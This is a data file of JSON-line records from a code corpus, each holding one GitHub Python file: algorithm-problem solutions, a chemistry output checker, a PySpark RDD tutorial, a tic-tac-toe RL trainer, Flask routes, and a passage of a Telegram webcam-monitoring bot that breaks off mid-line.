+{"seq_id":"28659189085","text":"import copy\r\n\r\nm, n = map(int, input().split())\r\nbox = [[*map(int, input().split())]for _ in range(n)]\r\n\r\ntomato = []\r\nminus_cnt = 0\r\nfor i in range(n):\r\n for j in range(m):\r\n if box[i][j] == 1:\r\n tomato.append((i, j))\r\n if box[i][j] == -1:\r\n minus_cnt+=1\r\n\r\n\r\ndef get_cnt(tomato):\r\n cnt = 0\r\n tmp = []\r\n for x, y in tomato:\r\n for dx, dy in [(1, 0), (0, 1), (-1, 0), (0, -1)]:\r\n nr, nc = x + dx, y + dy\r\n if 0 <= nr < n and 0 <= nc < m and box[nr][nc] == 0:\r\n box[nr][nc] = 1\r\n cnt += 1\r\n tmp.append((nr, nc))\r\n return cnt, tmp\r\n\r\nans = 0\r\ntotal = 0\r\nwhile True:\r\n cnt, tomato = get_cnt(tomato)\r\n total += cnt\r\n if cnt == 0:\r\n break\r\n ans += 1\r\n\r\nfor i in range(n):\r\n for j in range(m):\r\n if box[i][j] == 0:\r\n ans = -1\r\n break\r\n if ans == -1:\r\n break\r\nprint(ans)","repo_name":"hjle2/Algorithm","sub_path":"백준/Gold/7576. 토마토/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33806445035","text":"#\n# compares MPQC4 outputs\n# usage: check.py \n#\n\n##########################################################\n# util\n##########################################################\n\n# should work with python 2 and 3\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport sys, re, math\nimport json\n\n# reload(sys)\n# sys.setdefaultencoding(\"utf-8\")\n\ndefault_precision = {\n \"Energy\" : 1.0e-9,\n \"GFRealPole\" : 1.0e-4,\n \"ExcitationEnergy\" : 1.0e-6\n}\n\ndef validate(label, data, refdata, tolerance):\n if not isinstance(data,list):\n data = [data]\n if not isinstance(refdata,list):\n refdata = [refdata]\n ok = True\n ndata = len(refdata)\n for i in range(ndata):\n datum = float(data[i])\n refdatum = float(refdata[i])\n if (math.fabs(refdatum - datum) > tolerance):\n print(refdatum)\n print(datum)\n ok = False\n break\n return ok\n\ndef pat_numbers(n):\n result = ''\n for i in range(n):\n result += '\\s*([+-e\\d.]+)'\n return result\n\ndef parse_json(file_name):\n match = False\n json_lines = \"\"\n with open(file_name, 'r') as file:\n for line in file:\n if match:\n json_lines += line\n if not match:\n match = re.match('^\\s*Output KeyVal \\(format=JSON\\):',line)\n\n result = json.loads(json_lines)\n return result\n\n\ndef total_energy(json):\n return json[\"property\"][\"value\"][\"value\"]\n\n\ndef get_precision(json):\n if \"precision\" not in json[\"property\"]:\n property = json[\"property\"][\"type\"]\n return default_precision[property]\n else:\n return float(json[\"property\"][\"precision\"])\n##########################################################\n# main\n##########################################################\nfile_name = sys.argv[1]\noutput_json = parse_json(file_name)\nvalue = total_energy(output_json)\n\nref_file_name = sys.argv[2]\nref_json = parse_json(ref_file_name)\nref_value = total_energy(ref_json)\n\n# how precise should we expect the results to agree? Depends on precision of both results\nprecision = max( get_precision(output_json), get_precision(ref_json) )\n\n\neok = validate(\"value\", value, ref_value, precision)\nok = eok\nif not ok: sys.exit(1)\n","repo_name":"ValeevGroup/mpqc","sub_path":"tests/validation/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"69"}
+{"seq_id":"28590494624","text":"class CarSpecExtractor:\n\n \n def cleanEmptyLists(self,lists):\n\n cleanLists = [l for l in lists if l != []]\n\n return cleanLists\n \n \n def replaceRepeatedKeys(self,keys):\n\n keysFilter = []\n\n for key in keys:\n if key[0] == 'Dianteiros' and key[1] == 'Traseiros':\n key = ['Freios dianteiros','Freios traseiros']\n\n if key[0] == 'Dianteira' and key[1] == 'Elemento elástico':\n key = ['Suspensão dianteira','Elemento elástico dianteiro']\n\n if key[0] == 'Traseira' and key[1] == 'Elemento elástico':\n key = ['Suspensão traseira','Elemento elástico traseiro']\n\n if key[0] == 'Dianteiros' and key[1] == 'Altura do flanco':\n key = ['Pneus dianteiros','Altura do flanco dianteiro']\n\n if key[0] == 'Traseiros' and key[1] == 'Altura do flanco':\n key = ['Pneus traseiros','Altura do flanco traseiro']\n\n keysFilter.append(key)\n \n\n return keysFilter\n\n def cleanRawValues(self,values):\n\n valuesFilter = []\n\n for value in values:\n\n if len(value)>2:\n value = [v for v in value if v!=\"1\"]\n value = [v for v in value if v!=\"2\"]\n value = [v for v in value if v!=\"3\"]\n\n value = [v for v in value if \"\\n\" not in v]\n \n for v in value:\n if v==' kg/cv' or v==' kg/kgfm':\n value[0]=value[0]+value[1]\n value.pop(1)\n\n if 'rpm' in v and 'kgfm' in v:\n value[-1]=value[-2]+value[-1]\n value.pop(-2)\n \n if len(value)>2:\n value[-1]= value[-2]+\" \"+value[-1]\n value.pop(-2)\n\n \n valuesFilter.append(value)\n\n return valuesFilter\n \n\n \n def transformKeys(self,keys):\n\n keys[-2] = ['Consumo urbano','Consumo rodoviario']\n keys[-1] = ['Consumo urbano2','Consumo rodoviario2']\n\n keys.append(['Autonomia urbana','Autonomia rodoviaria'])\n keys.append(['Autonomia urbana2','Autonomia rodoviaria2'])\n\n def checkDoubleFields(self,carSpecRaw):\n\n if 'Autonomia urbana' not in carSpecRaw:\n carSpecRaw['Autonomia urbana'] = carSpecRaw.pop('Consumo urbano2')\n carSpecRaw['Autonomia rodoviaria'] = carSpecRaw.pop('Consumo rodoviario2')\n\n","repo_name":"gms1992/carSpec","sub_path":"carspec/carscrap/extractor/CarSpecExtractor.py","file_name":"CarSpecExtractor.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29811676613","text":"import sys\n\ninput = sys.stdin.readline\n\n\n# 10845 큐\n# 간단한 기능을 가진 큐를 구현하는 문제\n# deque 모듈을 사용할 수도 있지만 연산의 수가 매우 적기 때문에\n# 단순히 리스트를 사용하여 구현하였다.\ndef sol10845():\n q = []\n head = 0\n cnt = 0\n answer = []\n for _ in range(int(input())):\n cmd = input().split()\n if len(cmd) == 2:\n q.append(cmd[1])\n cnt += 1\n else:\n t = cmd[0][0]\n if t == 'p':\n if cnt:\n answer.append(q[head])\n head += 1\n cnt -= 1\n else:\n answer.append('-1')\n elif t == 'f':\n answer.append(q[head] if cnt else '-1')\n elif t == 'b':\n answer.append(q[-1] if cnt else '-1')\n elif t == 's':\n answer.append(str(cnt))\n else:\n answer.append('0' if cnt else '1')\n return '\\n'.join(answer)\n","repo_name":"Scalas/PS_BaekJoon","sub_path":"solutions/sol10845.py","file_name":"sol10845.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18527481695","text":"from tqdm import tqdm\n\nfrom environment.state import State, all_states\nfrom agent.player import Player\n\n\nclass Judger:\n # @player1: the player who will move first, its chessman will be 1\n # @player2: another player with a chessman -1\n def __init__(self, player1, player2):\n self.p1 = player1\n self.p2 = player2\n self.current_player = None\n self.p1_symbol = 1\n self.p2_symbol = -1\n self.p1.set_symbol(self.p1_symbol)\n self.p2.set_symbol(self.p2_symbol)\n self.current_state = State()\n\n def reset(self):\n self.p1.reset()\n self.p2.reset()\n\n def alternate(self):\n while True:\n yield self.p1\n yield self.p2\n\n # @print_state: if True, print each board during the game\n def play(self, print_state=False):\n alternator = self.alternate()\n self.reset()\n current_state = State()\n self.p1.set_state(current_state)\n self.p2.set_state(current_state)\n if print_state:\n current_state.print_state()\n while True:\n player = next(alternator)\n i, j, symbol = player.act()\n next_state_hash = current_state.next_state(i, j, symbol).hash()\n current_state, is_end, _ = all_states[next_state_hash]\n self.p1.set_state(current_state)\n self.p2.set_state(current_state)\n if print_state:\n current_state.print_state()\n if is_end:\n return current_state.winner\n\n\ndef train(epochs, print_every_n=1000):\n player1 = Player(epsilon=0.01)\n player2 = Player(epsilon=0.01)\n judger = Judger(player1, player2)\n player1_win = 0.0\n player2_win = 0.0\n for i in tqdm(range(1, epochs + 1)):\n winner = judger.play(print_state=False)\n if winner == 1:\n player1_win += 1\n if winner == -1:\n player2_win += 1\n if i % print_every_n == 0:\n print('Epoch %d, player 1 winrate: %.02f, player 2 winrate: %.02f' % (i, player1_win / i, player2_win / i))\n player1.backup()\n player2.backup()\n judger.reset()\n player1.save_policy()\n player2.save_policy()\n\n\ndef compete(turns):\n player1 = Player(epsilon=0)\n player2 = Player(epsilon=0)\n judger = Judger(player1, player2)\n player1.load_policy()\n player2.load_policy()\n player1_win = 0.0\n player2_win = 0.0\n for _ in range(turns):\n winner = judger.play()\n if winner == 1:\n player1_win += 1\n if winner == -1:\n player2_win += 1\n judger.reset()\n print('%d turns, player 1 win %.02f, player 2 win %.02f' % (turns, player1_win / turns, player2_win / turns))\n\n\n# class HumanPlayer:\n# def __init__(self, **kwargs):\n# self.symbol = None\n# self.keys = ['q', 'w', 'e', 'a', 's', 'd', 'z', 'x', 'c']\n# self.state = None\n#\n# def reset(self):\n# pass\n#\n# def set_state(self, state):\n# self.state = state\n#\n# def set_symbol(self, symbol):\n# self.symbol = symbol\n#\n# def act(self):\n# self.state.print_state()\n# key = input(\"Input your position:\")\n# data = self.keys.index(key)\n# i = data // BOARD_COLS\n# j = data % BOARD_COLS\n# return i, j, self.symbol\n#\n# # The game is a zero sum game. If both players are playing with an optimal strategy, every game will end in a tie.\n# # So we test whether the AI can guarantee at least a tie if it goes second.\n# def play():\n# while True:\n# player1 = HumanPlayer()\n# player2 = Player(epsilon=0)\n# judger = Judger(player1, player2)\n# player2.load_policy()\n# winner = judger.play()\n# if winner == player2.symbol:\n# print(\"You lose!\")\n# elif winner == player1.symbol:\n# print(\"You win!\")\n# else:\n# print(\"It is a tie!\")\n\ntrain(int(1e4))\ncompete(int(1e3))\n","repo_name":"mabaoer/DRL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16324600344","text":"from torch.utils.data import DataLoader\n\nimport torchvision.datasets as datasets\nimport torchvision.transforms as T\n\n\ndef get_mnist_data_loader(root, batch_size, training=True):\n trfs = T.Compose([\n T.ToTensor()\n ])\n mnist = datasets.MNIST(root=root, train=training, transform=trfs, download=True)\n loader = DataLoader(mnist, batch_size, shuffle=True)\n return loader\n","repo_name":"eMDi94/ContinualLearning","sub_path":"DatasetDistillation/datasets/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21862605496","text":"fig, ax = plt.figure(), plt.axes()\nax.set_aspect(1)\n\n# Patches\nrect = plt.Rectangle(xy = (0.2, 0.2),\n width = 0.6,\n height = .6,\n facecolor = 'C0',\n edgecolor = 'C1')\npatch = ax.add_artist(rect)\n\n# Lines\nx, y = [0.5, 0.5], [0, 1]\nline, = ax.plot(x, y)\nlines = ax.plot(y,x)\n\n# Text\ntext = ax.text(0.2, 0.8, 'Matlotlib', size = 13)","repo_name":"alexanderthclark/Matplotlib-for-Storytellers","sub_path":"python/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"9628523224","text":"import functools\nfrom app import app\nfrom flask import jsonify, request\nfrom .utils.api_helpers import get_audio_features, get_playlist_cover_image\n\n@functools.lru_cache(maxsize=30)\n@app.route('/api/v1/user-playlist', methods=['POST'])\ndef user_playlist():\n request_json = request.get_json()\n playlist_id = request_json.get('playlistId')\n if not playlist_id:\n return jsonify({\n 'error': 'Something went wrong'\n })\n return jsonify(get_audio_features('spotify', playlist_id))\n\n@functools.lru_cache(maxsize=30)\n@app.route('/api/v1/get-playlist-cover-image', methods=['POST'])\ndef playlist_cover_image():\n request_json = request.get_json()\n playlist_id = request_json.get('playlistId')\n if not playlist_id:\n return jsonify({\n 'error': 'Something went wrong',\n })\n return jsonify(get_playlist_cover_image(playlist_id))\n","repo_name":"bljustice/playlistviz","sub_path":"services/playlists/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34894498796","text":"#simple python program to calculate bonus for all employees\nsallst=[10000,200000,15000,25000,30000]\nbonus=.5\n#traditional way of writing the common code\nsalbonuslst=[]\nfor sal in sallst:\n salbonuslst.append(sal+(sal*bonus))\nprint(salbonuslst)\n\n#FBP way of writing the python code\nlam=lambda sal:sal+(sal*bonus)\nsalbonuslst=list(map(lam,sallst)) #features of python programming HOF, lambda func, collection\nprint(salbonuslst)\n\ndef fun1(sal):\n return sal+(sal*bonus)\nsalbonuslst=list(map(fun1,sallst)) #50 seconds to process this data\nprint(salbonuslst)\n\n#I am going to conver the above python to a pyspark prog why?\n# Ans0: For handling bigdata with high throughput and low latency\n# Ans1: for distributed/parallel/multithreading/concurrancy In memory computing\n# ans2: improving the performance\n# ans3: scalability, fault tolerant\n\nsallst=[10000,200000,15000,25000,30000]\nbonus=.5\n\n#traditional way of writing the spark core programming\n#from pyspark.context import *\n#sc=SparkContext(\"local[2]\",\"WE39 Application1\") #cluster managers - local/standalone/yarn/mesos/kuberneties\n#rdd1=sc.parallelize(sallst)\n#print(rdd1.getNumPartitions())\n#print(rdd1.glom().collect())\n#rdd2=rdd1.map(fun1)\n#print(rdd2.collect())\n#50 seconds to process this data\n#salbonuslst=map(fun1,sallst)\n#print(salbonuslst)\n#sc.stop()\n\n#modern way of writing the spark core programming and spark sql programming\nfrom pyspark.sql.session import SparkSession\nspark=SparkSession.builder.master(\"local[2]\").appName(\"WE39 Application2\").getOrCreate()\n#the above line has instantiated spark object (used for writing SQL queries),\n# sparkContext object (used for writing core programming)\n#sql program\nspark.read.csv(\"file:///home/hduser/cust_bkp.txt\").show()\n#RDD program\nprint(spark.sparkContext.textFile(\"file:///home/hduser/cust_bkp.txt\").collect())\n\n#We are going to learn the Spark Core Transformations and Actions (not so important interms of working in Orgs,\n# rather important to know once for all)\n#Creating RDDs\n#1. From files, 2. From another RDD, 3. From memory, 4. programatically\nsc=spark.sparkContext\nrdd1=sc.textFile(\"file:///home/hduser/cust_bkp.txt\")\nprint(rdd1.getNumPartitions())\n\n#2. From another RDD\nrdd1.collect()\n#['1,1000', '2,3000', '3,4000', '4,2000']\nlam=lambda x:x.split(\",\")\nrdd2=rdd1.map(lam)\n#[['1', '1000'], ['2', '3000'], ['3', '4000'], ['4', '2000']]\n\n#3. RDD from memory\nrdd2.cache()\nrdd3=rdd2.map(lambda x:int(x[3]))\nprint(rdd3.collect())\nprint(rdd3.sum())\nprint(rdd3.count())\nrdd2.unpersist()\n\n#4. Create RDD Programatically\nrdd1=sc.parallelize(sallst)\nprint(rdd1.getNumPartitions())\nprint(rdd1.glom().collect())\n\n#Transformations :\n#Passive - if a transformation produces the no. of elements output that is equal to the input\n#Active - If a transformation produces the no. of elements output that is not equal to the input\n# core - sql - programming lang\n#1.map - select - for loop\nhadooplines= sc.textFile(\"hdfs://127.0.0.1:54310/user/hduser/empdata.txt\")\nprint(hadooplines.collect())\n\nrdd2=hadooplines.map(lambda rec:rec.split(\",\"))\n#below type can be defined as list(list(string))\n#[\n# ['ArunKumar', 'chennai', '33', '2016-09-20', '100000'],\n# ['Lara', 'chennai', '55', '2016-09-21', '10000'],\n# ['vasudevan', 'banglore', '43', '2016-09-23', '90000'],\n# ['irfan', 'chennai', '33', '2019-02-20', '20000'],\n# ['basith', 'CHENNAI', '29', '2019-04-22']\n# ]\nrdd3=rdd2.map(lambda delimitedrec:delimitedrec[1].upper())\nprint(rdd3.collect())\n\n#2.filter - where - for loop and if condition\nrdd4=rdd2.filter(lambda delimitedrec:delimitedrec[1].upper()=='CHENNAI')\nprint(rdd4.collect())\n\n#3. Flatmap - pivot/explode - nested for loop\n# convert the data to structured from unstructured.\n# below data is of what type?\n# structed data with space delimiter but malformed and eligible for becoming semistructured\n# how structed - because the below can be related with each other and they are not seperated/unified/seperated.\n# for eg. irfan's age is 40 or custid 1 is irfan\n# 1 irfan 40\n# 2 30 venkat chennai\n# 33 chennai kavya\n#semi structued format\n# {id:1,name:irfan,age:40}\n# {id:2,age:30,name:venkat,city:chennai}\n# {age:33,city:chennai,name:kavya}\nlinesrdd= sc.textFile(\"file:/home/hduser/mrdata/courses.log\")\nfmrdd=linesrdd.flatMap(lambda x:x.split(\" \"))\nfmrdd.foreach(print)\n\npythonlist=linesrdd.collect()\n#['hadoop spark hadoop spark kafka datascience', 'spark hadoop spark datascience', 'informatica java aws gcp', 'gcp aws azure spark', 'gcp pyspark']\nfor i in pythonlist:\n for j in i.split(\" \"):\n print(j)\n\n#4. union function (merge vertically) - if i pass 5 rows with 3 columns in 2 datsets it returns exactly 10 rows with 3 columns\nrdd1=sc.textFile(\"file:///home/hduser/hive/data/custspilot\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],'NA',x[2],x[3]))\nrdd2=sc.textFile(\"file:///home/hduser/hive/data/custsnopilot\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],x[2],x[3],x[4]))\nrdd3=rdd1.union(rdd2)\nrdd4=rdd1.intersection(rdd2)\nrdd5=rdd1.subtract(rdd2)\n\nrdd1=sc.textFile(\"file:///home/hduser/hive/data/custsnopilot\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],'NA',x[2],x[3]))\nrdd2=sc.textFile(\"file:///home/hduser/hive/data/custsnopilot1\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],'NA',x[2],x[3]))\nrdd1.union(rdd2).count()\n\n#5. Distinct transformation\nrdd1.union(rdd2).distinct().count()\n\n#6. Zip (merge horizontally without a join condition) - if i pass 5 rows with 3 columns in 2 datsets it returns exactly 5 rows with 6 columns\n#Thumb rules:\n# number of rows should be same across both rdds\n# number of rows at every partition should be same across both rdds\n# Used only when there is no key columns available to join the RDDs otherwise Joins are preferred.\nrdd1=sc.textFile(\"file:/home/hduser/cust1.txt\")\nrdd2=sc.textFile(\"file:/home/hduser/cust2.txt\")\n#rdd1.coalesce(1).zip(rdd2.coalesce(1)).collect()\n\n#Zip With Index - add index to all the elements of the rdd\nrdd2=sc.textFile(\"file:/home/hduser/cust2.txt\")\nrdd2.zipWithIndex().collect()\n#usecase - return only the 3rd row of the rdd\nprint(rdd2.zipWithIndex().filter(lambda x:x[1]==2).map(lambda x:x[0]).collect())\n#I have source datafile with header and footer, I want to remove it?\n\n#Very Important:\n\n#Partition - Horizontal division of data or grouping of data or splitting of data or seperation of data\n#why partition - Inorder to divide, distribute, parallelize, throughput, concurrent access/processing of data\n#how to control the partitioning - naturally how it occured or using coalesce and repartition how to change the degree of parallelism\n#using partitioning concepts in our so far learning and subsequent learning\n#HDFS - Blocks, MR - Input split (mappers/reducers), YARN AM/containers, SQOOP Mappers, HIVE Partitions/Buckets,\n# SPARK - partitions (naturally partition created (size, Blocks/Input split/mappers/reducers/Containers/Partitions/Buckets),\n# change the partition)\n\n#naturally how partitions created when we create rdds (in spark core, we learn spark sql and streaming partitioning soon)\n#1. parallelize will go with the number of cores defined in the sparksession object for default partitions\n#2. parallelize will go with the second argument value if i pass a higher or lower number of partitions\n#3. textFile will go with the size of data in a chunk of 32mb by default if the size of the data is >32 mb size\n#4. textFile will go with the default partition of 2 if the data is <32 mb size\n#5. textFile will go with the second argument value if i override with the higher number of partitions that naturally created\n\n#1\nrdd1=sc.parallelize(range(1,100))\nprint(rdd1.getNumPartitions())\n\n#2\nrdd1=sc.parallelize(range(1,100),1)\nprint(rdd1.getNumPartitions())\n\n#3\nrdd1=sc.textFile(\"file:/home/hduser/sparkdata/youtube_videos.tsv\") #size of this data is 143mb\nprint(rdd1.getNumPartitions())\n\n#4\nrdd1=sc.textFile(\"file:/home/hduser/cust1.txt\")\nprint(rdd1.getNumPartitions())\n\n#5\nrdd1=sc.textFile(\"file:/home/hduser/sparkdata/youtube_videos.tsv\",10)\nprint(rdd1.getNumPartitions()) #10\nrdd1=sc.textFile(\"file:/home/hduser/sparkdata/youtube_videos.tsv\",1)\nprint(rdd1.getNumPartitions()) #5\n\n#Partition Handling\n# Difference between coalesce and repartition\n# 1. coalese used to reduce no. of partitions - Repartition is used for increase the no. of partition despite it support decrease the no. of partition also\n# 2. Coalesce will be applied if the data is aggregated or filtered - Repartition will be applied if the data is joined or unioned\n# 3. Coalesce is efficient in distributing the data by avoid shuffling - Repartition is costly because it always shuffles\n# 4. Coalesce is costly in maintaining partition size in equally - Repartition maintains partition size equally\n# 5. why inequal partition because Coalesce uses range partitioning - Repartition uses round robin partitioning\n\n#How to increase or decrease the partitions\n\n#coalesce - Used to Decrease the no. of partions we use coalesce function,\n# coalesce supports only decrease the number of partitions,\n#Coalesce use range of partitioning\n#1,2,3,4,5 -> 3- [1,2],[3,4],[5]\n# benefit - try to aviod shuffling (copying of data from mapper/one executor to the reducer/another executor)\n# will happen rarely hence less cost\n# drawback - in-equal number of distribution of partitions happens because of range partitioning\n#When to use Coalesce? applied when we wanted to process the rdd further with less number of tasks or finalize/store the rdds\nrdd2=sc.textFile(\"file:///home/hduser/hive/data/custs2\")\nrdd3=rdd1.union(rdd2)\nrdd3.getNumPartitions()\n#6\nrdd1.getNumPartitions()\n#2\nrdd2.getNumPartitions()\n4\nrdd4=rdd3.repartition(10)\nrdd4=rdd3.map(lambda x:x.split(\",\")).filter(lambda x:int(x[3])>60)\nrdd4.count()\n#758280\nrdd3.count()\n#2669733\nrdd4.getNumPartitions()\n6\nrdd4.getNumPartitions()\n#10\nrdd5=rdd4.coalesce(3)\nprint(rdd5.getNumPartitions())\n\n\n#Repartition - Used to Increase the no. of partions we use repartition function,\n# repartition supports both increase or decrease the number of partitions (preferably coalesce has to be used for decreasing)\n#repartition uses round robin/hash partitioning\n#1,2,3,4,5, -> 3- [1,4],[2,5],[3,6]\n# benefit - equal number of distribution of partitions\n# drawback - shuffling happens hence costly\n#When to use Repartition? applied when we wanted to process the rdd further with more number of tasks (map, filter, flatmap)\n\n#Reduce by key transformation\n#First lets understand reduce function\n# calculate the total sales happened with the transaction amt >1000\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nrdd1.collect()\n#['1,Chennai,Mobile,1000', '2,Chennai,Laptop,3000', '3,Hyd,mobile,4000', '4,Chennai,mobile,2000']\nrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:int(x[3])).filter(lambda x:x>1000)\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:int(x[3])).filter(lambda x:x>1000)\nmapfilterrdd2.collect()\n#[3000, 4000, 2000]\nmapfilterrdd2.getNumPartitions()\n#2\nmapfilterrdd2.reduce(lambda b,f:b+f)\n#9000\n\n# calculate the city wise total sales happened with the transaction amt >1000\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:((x[1]),int(x[3]))).filter(lambda x:x[1]>1000)\nreducedrdd3=mapfilterrdd2.reduceByKey(lambda x,y:x+y)\nprint(reducedrdd3.collect())\n\n#Checkpoint\n#Below code work well if the source is batch or static or permenant\n\n#What if the source is dynamic or transient or STREAMING in nature, below code will not work well if the source is streaming\n\n#Narrow and wide transformations\n#Narrow transformation - if a transformation depends on the output of the other transformation directly\n#No stage split will happen\n\n\n#Cache and Persist\n#What is- Cache is a transformation used to inform spark not to run the Garbage collection on the rdd that has been cached\n# after we perform an action on the rdd\n#When do we use caching - If we are going to use an rdd or the subsequent rdds repeatedly for performing transformation or action\n#What is Persist - is a transformation used to inform spark not to run the Garbage collection on the rdd that has been persisted\n# in memory/disk/both/with replica/without replica/serialized/non-serialized after we perform an action on the rdd\n#When do we use Persist - If we are going to use an rdd or the subsequent rdds repeatedly for performing transformation or action\n# Persist will be used for leveraging more options than than cache in situations such as more volume of data that can't fit in the\n# entire memory or we need to replicate for better fault tolerance or we wanted to try with/without serialized dataset for processing\n# to manage the tradeoff between ser-de and the volume of data - if the volume is not so high then we can keep in a deserialized\n# fashion (we will get the benefits of processing faster without again deserializing)\n\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:((x[1]),int(x[3]))).filter(lambda x:x[1]>1000)\nreducedrdd3=mapfilterrdd2.reduceByKey(lambda x,y:x+y)\nreducedrdd4=mapfilterrdd2.map(lambda x:x[0])\nreducedrdd3.collect()\n#[('Chennai', 5000), ('Hyd', 4000)]\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nreducedrdd4.collect()\n#['Chennai', 'Hyd', 'Chennai']\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:((x[1]),int(x[3]))).filter(lambda x:x[1]>1000)\nmapfilterrdd2.cache()\n#PythonRDD[357] at RDD at PythonRDD.scala:53\nreducedrdd3=mapfilterrdd2.reduceByKey(lambda x,y:x+y)\nreducedrdd4=mapfilterrdd2.map(lambda x:x[0])\nreducedrdd3.count()\n#2\nreducedrdd4.count()\n#3\nmapfilterrdd2.count()\n#3\nrdd1.count()\n#4\nmapfilterrdd2.unpersist()\n#PythonRDD[357] at RDD at PythonRDD.scala:53\n\nfrom pyspark import StorageLevel\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY)\nmapfilterrdd2.count()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_2)\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_2)\nmapfilterrdd2.count()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_3)\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_3)\nmapfilterrdd2.count()\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.MEMORY_AND_DISK)\nmapfilterrdd2.count()\nmapfilterrdd2.unpersist()\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.MEMORY_AND_DISK_2)\nmapfilterrdd2.count()\n\n#Cache/Persist vs Checkpoint\n#Cache and Persist will retain the lineage but the Checkpoint will Truncate or cut the lineage and stores the data in HD/HDFS Checkpoint directory\n\n#Cache/Persist will retain the lineage, but use the lineage for the first time materialize the data\n# subsequently provide the data from cache memory/persisted DISK location, if the data in the mem/disk is lost then\n# get it from original source using lineage\n\n#Checkpoint removes the lineage in the DAG and use the lineage for the first time,\n# subsequently always provide the data from checkpoint dir\nsc.setCheckpointDir(\"file:/home/hduser/ckptdir/\") #need to ensure this ckpt dir is present in all workers\nsc.setCheckpointDir(\"/user/hduser/ckptdir/\")#use hdfs for better fault tolerance and performance also\nrdd2.checkpoint()\nrdd2.count()\n\n#saveAsTextFile will help us store the data in the hdfs/linux/cloud fs for using this data across the applications\n\n","repo_name":"sundarbee/Spark_Learning","sub_path":"Python_Pyspark_Programs/we39Project/learnspark/core/core_examples_1.py","file_name":"core_examples_1.py","file_ext":"py","file_size_in_byte":15220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33931282433","text":"import glob, os, psutil, sys, subprocess\nfrom telegram.ext import Updater, CommandHandler\nimport logging\nprint(\"---\")\nprint(\"Starting Telegram bot for home surveillance\")\nprint(\"v. 0.1 by @ttan_\")\nprint(\"---\")\nprint(\"daemonising...\")\n\nif os.fork(): exit(0)\nos.umask(0) \nos.setsid() \nif os.fork(): exit(0)\n\nsys.stdout.flush()\nsys.stderr.flush()\nsi = file('/dev/null', 'r')\nso = file('/dev/null', 'a+')\nse = file('/dev/null', 'a+', 0)\nos.dup2(si.fileno(), sys.stdin.fileno())\nos.dup2(so.fileno(), sys.stdout.fileno())\nos.dup2(se.fileno(), sys.stderr.fileno())\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\nupdater = Updater(token='xx:xxxx') #Telegram bot token here\ndispatcher = updater.dispatcher\nchat_id = 12345 #telegram chat_id (user or group)\n\ndef take_snap(bot, update):\n\tbot.send_message(chat_id, text=\"Taking a snapshot, please wait...\")\n\tres = subprocess.Popen([\"fswebcam\", \"-r 1280x720\", \"grab.jpeg\"], shell=False, stdout=subprocess.PIPE, cwd=\"/root/motion/pics\");\n\tres.wait()\n\tbot.send_photo(chat_id, photo=open(\"/root/motion/pics/grab.jpeg\", \"rb\"))\n\t\ndef clean(bot, update):\n\tdirectory='/root/motion/pics'\n\tos.chdir(directory)\n\tfiles=glob.glob('*.jpg')\n\tfor filename in files:\n\t os.remove(filename)\n\tbot.send_message(chat_id, text=\"All pictures deleted!\")\n\ndef start(bot, update):\n\tbot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\n\tprint(update.message.chat_id)\n\ndef startMotion(bot, update):\n\tres = subprocess.Popen([\"motion\", \"-c /root/motion/motion.conf\"], shell=False, stdout=subprocess.PIPE, cwd=\"/root/motion\")\n\tbot.send_message(chat_id, text=\"Motion detection started!\")\n\ndef stopMotion(bot, update):\n\tPROCNAME = \"motion\"\n\n\tfor proc in psutil.process_iter():\n\t # check whether the process name matches\n\t if proc.name() == PROCNAME:\n\t proc.kill()\n\n\tbot.send_message(chat_id, text=\"Motion detection stopped!\")\n\ndef checkMotion(bot, update):\n\t ps = subprocess.check_output(('ps'))\n\t if (ps.find(\"motion\")) == -1:\n\t \tbot.send_message(chat_id, text=\"Motion detection not 